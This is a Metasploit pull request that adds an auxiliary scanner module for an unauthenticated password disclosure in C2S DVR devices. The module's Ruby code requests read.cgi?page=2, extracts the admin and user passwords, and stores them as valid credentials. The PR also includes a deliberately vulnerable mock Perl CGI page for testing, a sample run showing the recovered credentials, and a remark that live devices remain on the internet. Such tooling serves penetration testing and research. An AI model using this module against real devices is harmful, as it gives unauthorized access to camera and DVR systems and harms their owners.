### PR TITLE
c2s dvr password disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
+++ b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
@@ -1,6 +1,8 @@
 ## Description
 
-  C2S DVR allows an unauthenticated user to disclose the username & password by requesting the javascript page `read.cgi?page=2`
+C2S DVR allows an unauthenticated user to disclose the username
+& password by requesting the javascript page 'read.cgi?page=2'.
+This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
 
 ## Vulnerable Application
 

--- a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
+++ b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
@@ -1,0 +1,74 @@
+## Description
+
+  C2S DVR allows an unauthenticated user to disclose the username & password by requesting the javascript page `read.cgi?page=2`
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+
+my $data = <<'DATA';
+var pw_enflag = "1";
+var pw_adminpw = "12345";
+var pw_retype1 = "12345";
+var pw_userpw = "56789";
+var pw_retype2 = "56789";
+var pw_autolock = "0";
+DATA
+
+if ($Q::page == 2) {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+    resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
+    resource (c2s.rb)> set rhosts 127.0.0.1
+    rhosts => 127.0.0.1
+    resource (c2s.rb)> set verbose true
+    verbose => true
+    resource (c2s.rb)> exploit
+    [*] Attempting to load data from /cgi-bin/read.cgi?page=2
+    [+] Found: admin:12345
+    [+] Found: user:56789
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+    [*] Starting persistent handler(s)...
+    msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
+    Credentials
+    ===========
+    
+    host       origin     service        public  private  realm  private_type
+    ----       ------     -------        ------  -------  -----  ------------
+    127.0.0.1  127.0.0.1  80/tcp (http)  admin   12345           Password
+    127.0.0.1  127.0.0.1  80/tcp (http)  user    56789           Password
+  ```

--- a/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
+++ b/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'         => 'C2S DVR Management Password Disclosure',
+      'Description'  => %q{
+        C2S DVR allows an unauthenticated user to disclose the username
+        & password by requesting the javascript page 'read.cgi?page=2'
+      },
+      'References'   => [[ 'EDB', '40265' ]],
+      'Author'       =>
+        [
+          'Yakir Wizman', # discovery
+          'h00die',    # module
+        ],
+      'License'      => MSF_LICENSE,
+      'DisclosureDate' => 'Aug 19 2016'
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
+      ])
+  end
+
+  def run_host(rhost)
+    begin
+      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
+      vprint_status("Attempting to load data from #{url}?page=2")
+      res = send_request_cgi({
+        'uri'      => url,
+        'vars_get' => {'page'=>'2'}
+      })
+      unless res
+        print_error("#{peer} Unable to connect to #{url}")
+        return
+      end
+
+      unless res.body.include?('pw_enflag')
+        print_error("Invalid response received for #{peer} for #{url}")
+        return
+      end
+
+      if res.body =~ /pw_adminpw = "(.+)";/
+        print_good("Found: admin:#{$1}")
+        store_valid_credential(
+          user:         'admin',
+          private:      $1,
+          private_type: :password
+        )
+      end  
+
+      if res.body =~ /pw_userpw = "(.+)";/
+        print_good("Found: user:#{$1}")
+        store_valid_credential(
+          user:         'user',
+          private:      $1,
+          private_type: :password
+        )
+      end
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} Unable to connect to site")
+      return
+    end
+  end
+end

--- a/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
+++ b/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
@@ -14,6 +14,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'  => %q{
         C2S DVR allows an unauthenticated user to disclose the username
         & password by requesting the javascript page 'read.cgi?page=2'.
+        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
       },
       'References'   => [['EDB', '40265']],
       'Author'       =>

--- a/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
+++ b/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary
       'Name'         => 'C2S DVR Management Password Disclosure',
       'Description'  => %q{
         C2S DVR allows an unauthenticated user to disclose the username
-        & password by requesting the javascript page 'read.cgi?page=2'
+        & password by requesting the javascript page 'read.cgi?page=2'.
       },
-      'References'   => [[ 'EDB', '40265' ]],
+      'References'   => [['EDB', '40265']],
       'Author'       =>
         [
           'Yakir Wizman', # discovery
@@ -25,10 +25,9 @@ class MetasploitModule < Msf::Auxiliary
       'DisclosureDate' => 'Aug 19 2016'
     )
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
-      ])
+    register_options([
+      OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
+    ])
   end
 
   def run_host(rhost)

--- a/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
+++ b/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
@@ -49,16 +49,16 @@ class MetasploitModule < Msf::Auxiliary
         return
       end
 
-      if res.body =~ /pw_adminpw = "(.+)";/
+      if res.body =~ /pw_adminpw = "(.+?)";/
         print_good("Found: admin:#{$1}")
         store_valid_credential(
           user:         'admin',
           private:      $1,
           private_type: :password
         )
-      end  
+      end
 
-      if res.body =~ /pw_userpw = "(.+)";/
+      if res.body =~ /pw_userpw = "(.+?)";/
         print_good("Found: user:#{$1}")
         store_valid_credential(
           user:         'user',


### PR DESCRIPTION
Simple PR with a 2016 password disclosure on a DVR system from EDB.  I created a mock page to emulate the vulnerability.  There are still some live ones on the internet according to shodan, not sure if they are vuln or not.

## Verification

- [ ] install the mock page, its super quick and easy.
- [ ] Start `msfconsole`
- [ ] `use exploit/auxiliary/gather/c2s_dvr_password_disclosure`
- [ ] set rhosts
- [ ] `exploit`
- [ ] **Verify** it finds creds